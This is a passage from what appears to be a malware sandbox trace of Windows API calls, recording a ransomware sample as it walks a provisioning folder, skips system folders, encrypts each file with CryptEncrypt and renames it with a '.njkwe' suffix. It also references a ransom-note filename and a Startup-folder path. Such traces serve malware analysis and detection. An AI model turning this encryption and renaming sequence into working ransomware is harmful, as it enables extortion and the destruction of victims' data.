(lpString1="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="$Recycle.bin") returned 1 [0076.148] lstrcmpiW (lpString1="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="System Volume Information") returned -1 [0076.148] lstrcmpiW (lpString1="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="Program Files") returned -1 [0076.148] lstrcmpiW (lpString1="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="Program Files (x86)") returned -1 [0076.148] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}") returned 80 [0076.148] lstrcmpW (lpString1="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2=".") returned 1 [0076.148] lstrcmpW (lpString1="{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="..") returned 1 [0076.148] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.148] GetProcessHeap () returned 0xbe0000 [0076.148] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0076.148] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*") returned 82 [0076.148] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a060 [0076.150] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.150] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.150] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.150] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.150] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.150] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\.") returned 82 [0076.150] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.150] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.150] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.150] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.150] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.150] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.150] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.150] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\..") returned 83 [0076.150] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.150] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.150] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f9117b, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f9117b, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f9117b, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x85a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0076.150] lstrcmpiW (lpString1="customizations.xml", lpString2="Windows") returned -1 [0076.150] lstrcmpiW (lpString1="customizations.xml", lpString2="$Recycle.bin") returned 1 [0076.150] lstrcmpiW (lpString1="customizations.xml", lpString2="System Volume Information") returned -1 [0076.150] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files") returned -1 [0076.151] lstrcmpiW (lpString1="customizations.xml", lpString2="Program Files (x86)") returned -1 [0076.151] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml") returned 99 [0076.151] StrStrIW (lpFirst="customizations.xml", lpSrch=".njkwe") returned 0x0 [0076.151] lstrcmpW (lpString1="customizations.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.151] lstrcmpW (lpString1="customizations.xml", lpString2="taridd") returned -1 [0076.151] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.151] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.151] GetTickCount () returned 0x1153610 [0076.151] GetTickCount () returned 0x1153610 [0076.151] GetTickCount () returned 0x1153610 [0076.151] GetTickCount () returned 0x1153610 [0076.151] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.151] GetProcessHeap () returned 0xbe0000 [0076.151] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.151] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x85a, lpOverlapped=0x0) returned 1 [0076.153] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff7a6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.153] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x85a, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x85a, lpOverlapped=0x0) returned 1 [0076.153] GetProcessHeap () returned 0xbe0000 [0076.153] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.153] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.154] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.154] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.154] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.154] CloseHandle (hObject=0x434) returned 1 [0076.154] GetProcessHeap () returned 0xbe0000 [0076.154] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.154] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml_r00t_{3sXlE5}.njkwe") returned 119 [0076.154] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\customizations.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.154] GetProcessHeap () returned 0xbe0000 [0076.154] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.155] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f6af14, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f6af14, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f6af14, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0076.155] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Windows") returned -1 [0076.155] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="$Recycle.bin") returned 1 [0076.155] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="System Volume Information") returned -1 [0076.155] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files") returned -1 [0076.155] lstrcmpiW (lpString1="MasterDatastore.xml", lpString2="Program Files (x86)") returned -1 [0076.155] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml") returned 100 [0076.155] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch=".njkwe") returned 0x0 [0076.155] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.155] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="taridd") returned -1 [0076.155] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.155] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0076.156] GetTickCount () returned 0x1153620 [0076.156] GetTickCount () returned 0x1153620 [0076.156] GetTickCount () returned 0x1153620 [0076.156] GetTickCount () returned 0x1153620 [0076.156] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0076.156] GetProcessHeap () returned 0xbe0000 [0076.156] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc50860 [0076.156] ReadFile (in: hFile=0x434, lpBuffer=0xc50860, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesRead=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.157] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffffef1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.157] WriteFile (in: hFile=0x434, lpBuffer=0xc50860*, nNumberOfBytesToWrite=0x10f, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc50860*, lpNumberOfBytesWritten=0x380f2d4*=0x10f, lpOverlapped=0x0) returned 1 [0076.157] GetProcessHeap () returned 0xbe0000 [0076.157] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc50860 | out: hHeap=0xbe0000) returned 1 [0076.157] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.157] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0076.158] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0076.159] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0076.159] CloseHandle (hObject=0x434) returned 1 [0076.159] GetProcessHeap () returned 0xbe0000 [0076.159] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.159] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe") returned 120 [0076.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\MasterDatastore.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\masterdatastore.xml_r00t_{3sxle5}.njkwe")) returned 1 [0076.159] GetProcessHeap () returned 0xbe0000 [0076.159] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0076.159] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Prov", cAlternateFileName="")) returned 1 [0076.159] lstrcmpiW (lpString1="Prov", lpString2="Windows") returned -1 [0076.159] lstrcmpiW (lpString1="Prov", lpString2="$Recycle.bin") returned 1 [0076.159] lstrcmpiW (lpString1="Prov", lpString2="System Volume Information") returned -1 [0076.159] lstrcmpiW (lpString1="Prov", lpString2="Program Files") returned 1 [0076.159] lstrcmpiW (lpString1="Prov", lpString2="Program Files (x86)") returned 1 [0076.159] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov") returned 85 [0076.160] lstrcmpW (lpString1="Prov", lpString2=".") returned 1 [0076.160] lstrcmpW (lpString1="Prov", lpString2="..") returned 1 [0076.160] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.160] GetProcessHeap () returned 0xbe0000 [0076.160] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0076.160] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*") returned 87 [0076.160] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0076.160] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.160] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.160] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.160] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.160] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.160] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\.") returned 87 [0076.160] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.160] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.160] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.160] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.160] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.160] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.160] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.160] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\..") returned 88 [0076.160] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.160] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.160] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="RunTime", cAlternateFileName="")) returned 1 [0076.160] lstrcmpiW (lpString1="RunTime", lpString2="Windows") returned -1 [0076.160] lstrcmpiW (lpString1="RunTime", lpString2="$Recycle.bin") returned 1 [0076.160] lstrcmpiW (lpString1="RunTime", lpString2="System Volume Information") returned -1 [0076.161] lstrcmpiW (lpString1="RunTime", lpString2="Program Files") returned 1 [0076.161] lstrcmpiW (lpString1="RunTime", lpString2="Program Files (x86)") returned 1 [0076.161] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime") returned 93 [0076.161] lstrcmpW (lpString1="RunTime", lpString2=".") returned 1 [0076.161] lstrcmpW (lpString1="RunTime", lpString2="..") returned 1 [0076.161] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0076.161] GetProcessHeap () returned 0xbe0000 [0076.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0076.161] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*") returned 95 [0076.161] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\*", lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a0a0 [0076.161] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0076.161] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0076.161] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0076.161] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0076.161] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0076.161] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\.") returned 95 [0076.161] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.161] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d1f7bd0, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x1d1f7bd0, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x1d1f7bd0, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0076.161] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0076.161] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0076.161] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0076.161] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0076.161] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0076.161] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\..") returned 96 [0076.161] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0076.161] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.161] FindNextFileW (in: hFindFile=0xc1a0a0, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53f1ea40, ftCreationTime.dwHighDateTime=0x1d29f93, ftLastAccessTime.dwLowDateTime=0x53f1ea40, ftLastAccessTime.dwHighDateTime=0x1d29f93, ftLastWriteTime.dwLowDateTime=0x53f44caa, ftLastWriteTime.dwHighDateTime=0x1d29f93, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="0__Power_Policy.provxml", cAlternateFileName="0__POW~1.PRO")) returned 1 [0076.161] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Windows") returned -1 [0076.161] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="$Recycle.bin") returned 1 [0076.161] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="System Volume Information") returned -1 [0076.161] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files") returned -1 [0076.161] lstrcmpiW (lpString1="0__Power_Policy.provxml", lpString2="Program Files (x86)") returned -1 [0076.162] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{9df6a4ed-fc16-48bf-8b24-6e2ad2bfcfea}\\Prov\\RunTime\\0__Power_Policy.provxml") returned 117 [0076.162] StrStrIW (lpFirst="0__Power_Policy.provxml", lpSrch=".njkwe") returned 0x0 [0076.162] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.162] lstrcmpW (lpString1="0__Power_Policy.provxml", lpString2="taridd") returned -1 [0076.162] StrCmpNW 